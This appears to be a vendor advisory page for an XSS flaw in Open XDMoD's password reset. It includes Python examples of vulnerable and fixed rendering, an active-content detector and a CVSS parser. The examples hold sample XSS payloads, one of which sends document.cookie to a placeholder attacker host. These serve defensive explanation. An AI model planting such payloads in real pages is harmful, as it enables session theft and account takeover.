HIGH | CVE-2026-45778 | CNA: GitHub_M

CVE-2026-45778: Open XDMoD Vulnerable to Reflected Cross-Site Scripting (XSS) in Password Reset

Open XDMoD is an open framework for collecting and analyzing HPC metrics. Prior to version 11.0.3, an authenticated attacker can inject malicious JavaScript into their own Open XDMoD user profile and abuse the password reset functionality to email a victim a link to an HTML page which, when visited, reflects the unsanitized profile content and executes it in the victim's browser, potentially leading to credential capture and Open XDMoD account takeover. All deployments of Open XDMoD prior to 11.0.3 are affected. The issue was reported privately on 2026-04-06; at the time of publication there is no evidence that it has been exploited in the wild. It was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually.
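To make the bug class concrete, the following is an added illustration and not Open XDMoD's code (the advisory reproduces no source or payload, and Open XDMoD itself is written in PHP; Python is used here only for illustration). A hypothetical reset-page template reflects a stored profile field, first without output encoding and then with context-aware encoding, and a small HTML parser checks whether the rendered page contains content a browser would execute. The payloads, template, reset link, and function names are all constructed for this example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample inputs (not from the advisory): display names an attacker
# stores on their own low-privilege account, and the reset link the application
# would generate for the victim. Hostnames are placeholders.
ATTACKER_PROFILE_NAME = (
    '"><script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
)
ATTACKER_PROFILE_NAME_HANDLER = '<img src=x onerror=alert(1)>'
RESET_LINK = "https://xdmod.example.org/password-reset?token=abc123"

# Hypothetical page template standing in for the reset page; the field names
# are illustrative and are not Open XDMoD identifiers.
TEMPLATE = (
    "<p>A password reset was requested by {name}. "
    '<a href="{link}">Reset your password</a></p>'
)


def render_reset_page_vulnerable(name: str, link: str) -> str:
    """Reflects the stored profile field into HTML without encoding (the bug class)."""
    return TEMPLATE.format(name=name, link=link)


def is_safe_reset_link(link: str) -> bool:
    """A reset link must be an absolute https URL, never javascript:/data:."""
    return urlsplit(link).scheme == "https"


def render_reset_page_fixed(name: str, link: str) -> str:
    """Encodes every untrusted value for the context it lands in.

    html.escape(quote=True) covers both text nodes and double-quoted attribute
    values. Restricting the link scheme is a general precaution added here;
    the advisory does not describe the link itself as attacker-controlled.
    """
    if not is_safe_reset_link(link):
        raise ValueError("reset link must be an https URL")
    return TEMPLATE.format(name=html.escape(name, quote=True),
                           link=html.escape(link, quote=True))


class _ActiveContentFinder(HTMLParser):
    """Records <script> elements and on* event-handler attributes in the parsed DOM."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.event_handlers.extend(name for name, _ in attrs if name.startswith("on"))


def executes_attacker_script(rendered_html: str) -> bool:
    """True if the rendered page contains active content a browser would run."""
    finder = _ActiveContentFinder()
    finder.feed(rendered_html)
    finder.close()
    return finder.script_tags > 0 or bool(finder.event_handlers)


if __name__ == "__main__":
    for payload in (ATTACKER_PROFILE_NAME, ATTACKER_PROFILE_NAME_HANDLER):
        for render in (render_reset_page_vulnerable, render_reset_page_fixed):
            page = render(payload, RESET_LINK)
            print(f"{render.__name__}: executes={executes_attacker_script(page)}")
```

The fix is output encoding at the point where the stored value is written into HTML; stripping `<script>` on input is not sufficient, because the same stored value can later land in an attribute or JavaScript context where a different encoding is needed.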

Metrics

CVSS v4.0: 8.6
Severity: HIGH
Fixed in: 11.0.3
Affected products: 1


HarborGuard Analysis

Synopsis

Reflected cross-site scripting (XSS) in Open XDMoD allows an authenticated attacker to store malicious JavaScript in their own user profile and abuse the password reset email flow to deliver a crafted link to a victim. The vulnerable endpoint is reachable over the network, the attacker needs only a low-privilege account, and the victim must visit the link. Because the script runs in the victim's browser under the Open XDMoD origin, a successful attack gives the attacker control of the victim's session, with high confidentiality and integrity impact (CVSS VC:H/VI:H), enabling credential capture and account takeover. A patched-image rebuild at version 11.0.3 is available on HarborGuard for environments running an affected version of ubccr/xdmod.

HarborGuard Coverage

Detection: Available

Detection of CVE-2026-45778 is available across every HarborGuard environment; the CVE is ingested from upstream advisory feeds within minutes of publication and matched against customer images, including custom-built images that bundle Open XDMoD. Any image containing ubccr/xdmod prior to version 11.0.3 is flagged automatically.

Triage: Available

HarborGuard scores this CVE at 8.6 HIGH using the CVSS v4.0 vector and surfaces it with that severity weighting in each customer's findings feed. Per-environment compliance policy weighting applies, and the finding is routed to the inbox or ticketing integration configured for each customer org.

Patch: Pending upstream

A patched-image rebuild targeting Open XDMoD 11.0.3 is available on HarborGuard for any environment running an affected image version. For customers who opt into auto-remediation, HarborGuard performs the rebuild, runs a regression test suite, and opens a pull request against affected workloads automatically.

Exploit Conditions

  • Network reachability: Required

    The attacker must reach the Open XDMoD service over the network to store the payload in their profile and trigger the password reset email flow (CVSS AV:N).

  • Authentication: Required

    A low-privilege Open XDMoD user account is sufficient; no administrative access is needed to stage the attack (CVSS PR:L).

  • Victim interaction: Required

    The victim must visit the crafted link delivered via email before the malicious JavaScript executes in their browser (CVSS UI:P).

  • Attack complexity: Low

    No race conditions, special configuration, or other environmental preconditions are required to stage or deliver the payload (CVSS AC:L, AT:N).
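The four conditions above are read directly off the CVSS v4.0 base vector published on this page. The following added example (not HarborGuard's code, which is not published) parses a v4.0 base vector strictly, rejects malformed or non-4.0 input, and maps the metrics onto the same condition and impact categories this page uses. It handles base metrics only (threat and environmental metrics are rejected) and does not reproduce the scoring tables, so it does not compute the 8.6.

```python
# CVSS v4.0 base-metric vocabulary. Only the allowed values are encoded here;
# the scoring (MacroVector) tables are not reproduced, so nothing below scores.
BASE_METRICS = {
    "AV": ("N", "A", "L", "P"),      # Attack Vector
    "AC": ("L", "H"),                # Attack Complexity
    "AT": ("N", "P"),                # Attack Requirements
    "PR": ("N", "L", "H"),           # Privileges Required
    "UI": ("N", "P", "A"),           # User Interaction
    "VC": ("H", "L", "N"),           # Vulnerable system Confidentiality
    "VI": ("H", "L", "N"),           # Vulnerable system Integrity
    "VA": ("H", "L", "N"),           # Vulnerable system Availability
    "SC": ("H", "L", "N"),           # Subsequent system Confidentiality
    "SI": ("H", "L", "N"),           # Subsequent system Integrity
    "SA": ("H", "L", "N"),           # Subsequent system Availability
}

# The vector published on this page for CVE-2026-45778.
PAGE_VECTOR = "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"


def parse_cvss4_base(vector: str) -> dict:
    """Strictly parse a CVSS v4.0 base vector into {metric: value}.

    Raises ValueError for a wrong version prefix, an unknown or repeated metric,
    an out-of-vocabulary value, or a missing base metric. Threat (E) and
    environmental metrics are not accepted by this base-only parser.
    """
    prefix, _, body = vector.strip().partition("/")
    if prefix != "CVSS:4.0":
        raise ValueError(f"not a CVSS v4.0 vector: {prefix!r}")
    metrics = {}
    for item in body.split("/"):
        key, sep, value = item.partition(":")
        if not sep or key not in BASE_METRICS:
            raise ValueError(f"unsupported or malformed metric: {item!r}")
        if value not in BASE_METRICS[key]:
            raise ValueError(f"invalid value {value!r} for {key}")
        if key in metrics:
            raise ValueError(f"duplicate metric: {key}")
        metrics[key] = value
    missing = [k for k in BASE_METRICS if k not in metrics]
    if missing:
        raise ValueError(f"missing base metrics: {missing}")
    return metrics


def is_valid_cvss4_base(vector: str) -> bool:
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        parse_cvss4_base(vector)
    except ValueError:
        return False
    return True


_IMPACT = {"H": "high", "L": "low", "N": "none"}


def exploit_conditions(m: dict) -> dict:
    """Translate base metrics into the condition and impact categories used on this page."""
    return {
        "network_reachability": {
            "N": "required (remote, network-reachable)",
            "A": "adjacent network only",
            "L": "local access",
            "P": "physical access",
        }[m["AV"]],
        "authentication": {
            "N": "none",
            "L": "low-privilege account",
            "H": "administrative account",
        }[m["PR"]],
        "victim_interaction": {
            "N": "none",
            "P": "passive (victim opens the delivered link or page)",
            "A": "active (victim must perform specific steps)",
        }[m["UI"]],
        # AC:L together with AT:N means no race, configuration or environmental precondition.
        "preconditions": "none" if (m["AC"], m["AT"]) == ("L", "N") else "required",
        "vulnerable_system_impact": {
            "confidentiality": _IMPACT[m["VC"]],
            "integrity": _IMPACT[m["VI"]],
            "availability": _IMPACT[m["VA"]],
        },
        # Any non-N subsequent-system metric means the impact crosses a trust boundary.
        "reaches_other_systems": any(m[k] != "N" for k in ("SC", "SI", "SA")),
    }


if __name__ == "__main__":
    for key, value in exploit_conditions(parse_cvss4_base(PAGE_VECTOR)).items():
        print(f"{key}: {value}")
```

For this CVE the parser yields: remote reachability required, a low-privilege account, passive victim interaction, no preconditions, high confidentiality and integrity impact with low availability impact, and no subsequent-system impact, which is exactly the list above and the Blast Radius that follows.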

Blast Radius

  • Reads the victim's active session tokens and any credential material visible in the browser context; HttpOnly cookies are not readable by script, but the script can still issue authenticated requests from within the victim's session.
  • Performs account takeover by capturing or resetting the victim's Open XDMoD credentials.
  • Modifies the victim's Open XDMoD profile and any HPC metrics data the victim's account is authorized to change.
  • Partially disrupts the victim's Open XDMoD access (low availability impact on the vulnerable component per the CVSS vector, VA:L).

How HarborGuard Handles This

Available on HarborGuard: images containing ubccr/xdmod are matched against CVE-2026-45778 at ingest time, and a rebuild targeting the patched version 11.0.3 is available for affected environments. For customers who opt into auto-remediation, the typical flow is a rebuilt image, a regression test run, and a pull request opened against affected workloads; for high-severity issues, median time from CVE publication to merged patch PR is around 90 minutes in environments with auto-remediation enabled. Where compliance policy requires manual review before merging, HarborGuard queues the rebuild and PR for engineer approval. Customers who prefer to apply the upstream patch manually (as the advisory suggests as a workaround) can use HarborGuard's findings detail to identify every affected image layer and confirm remediation once the patched image is in place.

Affected packages

  • ubccr/xdmod < 11.0.3

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N